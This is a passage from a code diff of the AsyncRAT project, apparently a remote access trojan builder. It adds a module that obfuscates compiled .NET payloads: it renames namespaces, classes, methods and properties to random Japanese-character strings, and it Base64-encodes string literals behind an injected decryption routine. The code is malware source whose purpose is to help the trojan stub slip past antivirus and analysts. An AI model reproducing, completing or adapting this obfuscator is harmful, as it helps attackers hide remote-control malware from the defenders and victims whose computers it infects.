/// <returns>The resolved MethodDef, or <c>null</c> if cannot be resolved.</returns>
public virtual MethodDef Resolve(MethodDef methodDef)
{
return null;
}
/// <summary>
/// Resolves the specified FieldDef.
/// </summary>
/// <param name="fieldDef">The FieldDef.</param>
/// <returns>The resolved FieldDef, or <c>null</c> if cannot be resolved.</returns>
public virtual FieldDef Resolve(FieldDef fieldDef)
{
return null;
}
}
/// <summary>
/// Context of the injection process.
/// </summary>
class InjectContext : ImportResolver
{
/// <summary>
/// The mapping of origin definitions to injected definitions.
/// </summary>
public readonly Dictionary<IDnlibDef, IDnlibDef> Map = new Dictionary<IDnlibDef, IDnlibDef>();
/// <summary>
/// The module which source type originated from.
/// </summary>
public readonly ModuleDef OriginModule;
/// <summary>
/// The module which source type is being injected to.
/// </summary>
public readonly ModuleDef TargetModule;
/// <summary>
/// The importer.
/// </summary>
readonly Importer importer;
/// <summary>
/// Initializes a new instance of the <see cref="InjectContext" /> class.
/// </summary>
/// <param name="module">The origin module.</param>
/// <param name="target">The target module.</param>
public InjectContext(ModuleDef module, ModuleDef target)
{
OriginModule = module;
TargetModule = target;
importer = new Importer(target, ImporterOptions.TryToUseTypeDefs);
}
/// <summary>
/// Gets the importer.
/// </summary>
/// <value>The importer.</value>
public Importer Importer
{
get { return importer; }
}
/// <inheritdoc />
public override TypeDef Resolve(TypeDef typeDef)
{
if (Map.ContainsKey(typeDef))
return (TypeDef)Map[typeDef];
return null;
}
/// <inheritdoc />
public override MethodDef Resolve(MethodDef methodDef)
{
if (Map.ContainsKey(methodDef))
return (MethodDef)Map[methodDef];
return null;
}
/// <inheritdoc />
public override FieldDef Resolve(FieldDef fieldDef)
{
if (Map.ContainsKey(fieldDef))
return (FieldDef)Map[fieldDef];
return null;
}
}
}
}

33
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/MethodsRenaming.cs Normal file
View File

@ -0,0 +1,33 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public class MethodsRenaming : IRenaming
{
public ModuleDefMD Rename(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (TypeDef type in moduleToRename.Types)
{
if (type.IsGlobalModuleType)
continue;
type.Name = Utils.GenerateRandomString();
foreach (MethodDef method in type.Methods)
{
if (!method.IsSpecialName && !method.IsConstructor && !method.HasCustomAttributes && !method.IsAbstract && !method.IsVirtual)
method.Name = Utils.GenerateRandomString();
foreach (ParamDef paramDef in method.ParamDefs)
{
paramDef.Name = Utils.GenerateRandomString();
}
}
}
return moduleToRename;
}
}
}

84
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/NamespacesRenaming.cs Normal file
View File

@ -0,0 +1,84 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public class NamespacesRenaming : IRenaming
{
private static Dictionary<string, string> _names = new Dictionary<string, string>();
public ModuleDefMD Rename(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (TypeDef type in moduleToRename.GetTypes())
{
if (type.IsGlobalModuleType)
continue;
if (type.Namespace == "")
continue;
string nameValue;
if (_names.TryGetValue(type.Namespace, out nameValue))
type.Namespace = nameValue;
else
{
string newName = Utils.GenerateRandomString();
_names.Add(type.Namespace, newName);
type.Namespace = newName;
}
}
return ApplyChangesToResources(moduleToRename);
}
private static ModuleDefMD ApplyChangesToResources(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (var resource in moduleToRename.Resources)
{
foreach (var item in _names)
{
if (resource.Name.Contains(item.Key))
{
resource.Name = resource.Name.Replace(item.Key, item.Value);
}
}
}
foreach (TypeDef type in moduleToRename.GetTypes())
{
foreach (var property in type.Properties)
{
if (property.Name != "ResourceManager")
continue;
var instr = property.GetMethod.Body.Instructions;
for (int i = 0; i < instr.Count; i++)
{
if (instr[i].OpCode == OpCodes.Ldstr)
{
foreach (var item in _names)
{
if (instr[i].ToString().Contains(item.Key))
instr[i].Operand = instr[i].Operand.ToString().Replace(item.Key, item.Value);
}
}
}
}
}
return moduleToRename;
}
}
}

26
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/PropertiesRenaming.cs Normal file
View File

@ -0,0 +1,26 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public class PropertiesRenaming : IRenaming
{
public ModuleDefMD Rename(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (TypeDef type in moduleToRename.GetTypes())
{
if (type.IsGlobalModuleType)
continue;
foreach (var property in type.Properties)
{
property.Name = Utils.GenerateRandomString();
}
}
return moduleToRename;
}
}
}

25
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/Utils.cs Normal file
View File

@ -0,0 +1,25 @@
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public static class Utils
{
public static string GenerateRandomString()
{
var sb = new StringBuilder();
for (int i = 1; i <= random.Next(10,30); i++)
{
var randomCharacterPosition = random.Next(0, alphabet.Length);
sb.Append(alphabet[randomCharacterPosition]);
}
return sb.ToString();
}
private static readonly Random random = new Random();
const string alphabet = "だうよたし長成に調順はんゃち赤たれま生くさ小番1で界世はてしと子の男たし院退がんゃち赤の男たれま生でムラグかずわ重体に昨で";
}
}

80
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/EncryptString.cs Normal file
View File

@ -0,0 +1,80 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation
{
public static class EncryptString
{
private static MethodDef InjectMethod(ModuleDef module, string methodName)
{
ModuleDefMD typeModule = ModuleDefMD.Load(typeof(DecryptionHelper).Module);
TypeDef typeDef = typeModule.ResolveTypeDef(MDToken.ToRID(typeof(DecryptionHelper).MetadataToken));
IEnumerable<IDnlibDef> members = InjectHelper.Inject(typeDef, module.GlobalType, module);
MethodDef injectedMethodDef = (MethodDef)members.Single(method => method.Name == methodName);
foreach (MethodDef md in module.GlobalType.Methods)
{
if (md.Name == ".ctor")
{
module.GlobalType.Remove(md);
break;
}
}
return injectedMethodDef;
}
public static void DoEncrypt(ModuleDef inPath)
{
EncryptStrings(inPath);
}
private static ModuleDef EncryptStrings(ModuleDef inModule)
{
ModuleDef module = inModule;
ICrypto crypto = new Base64();
MethodDef decryptMethod = InjectMethod(module, "Decrypt_Base64");
foreach (TypeDef type in module.Types)
{
if (type.IsGlobalModuleType || type.Name == "Resources" || type.Name == "Settings")
continue;
foreach (MethodDef method in type.Methods)
{
if (!method.HasBody)
continue;
if (method == decryptMethod)
continue;
method.Body.KeepOldMaxStack = true;
for (int i = 0; i < method.Body.Instructions.Count; i++)
{
if (method.Body.Instructions[i].OpCode == OpCodes.Ldstr) // String
{
string oldString = method.Body.Instructions[i].Operand.ToString(); //Original String
method.Body.Instructions[i].Operand = crypto.Encrypt(oldString);
method.Body.Instructions.Insert(i + 1, new Instruction(OpCodes.Call, decryptMethod));
}
}
method.Body.SimplifyBranches();
method.Body.OptimizeBranches();
}
}
return module;
}
}
}

13
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Interfaces/ICrypto.cs Normal file
View File

@ -0,0 +1,13 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces
{
public interface ICrypto
{
string Encrypt(string dataPlain);
}
}

9
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Interfaces/IRenaming.cs Normal file
View File

@ -0,0 +1,9 @@
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces
{
public interface IRenaming
{
ModuleDefMD Rename(ModuleDefMD module);
}
}

45
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/ModuleDefMD.cs Normal file
View File

@ -0,0 +1,45 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
// Credit github.com/srn-g/RenamingObfuscation
// Fxied by nyan cat
namespace AsyncRAT_Sharp.RenamingObfuscation
{
public class Renaming
{
public static ModuleDefMD DoRenaming(ModuleDefMD inPath)
{
ModuleDefMD module = inPath;
return RenamingObfuscation(inPath);
}
private static ModuleDefMD RenamingObfuscation(ModuleDefMD inModule)
{
ModuleDefMD module = inModule;
IRenaming rnm = new NamespacesRenaming();
module = rnm.Rename(module);
rnm = new ClassesRenaming();
module = rnm.Rename(module);
rnm = new MethodsRenaming();
module = rnm.Rename(module);
rnm = new PropertiesRenaming();
module = rnm.Rename(module);
rnm = new FieldsRenaming();
module = rnm.Rename(module);
return module;
}
}
}

2
AsyncRAT-C#/AsyncRAT-Sharp/packages.config
View File

@ -1,7 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="BouncyCastle" version="1.8.5" targetFramework="net46" />
<package id="dnlib" version="3.2.0" targetFramework="net46" />
<package id="FCTB" version="2.16.24" targetFramework="net46" />
<package id="Mono.Cecil" version="0.10.3" targetFramework="net46" />
<package id="Vestris.ResourceLib" version="1.6.422" targetFramework="net46" />
</packages>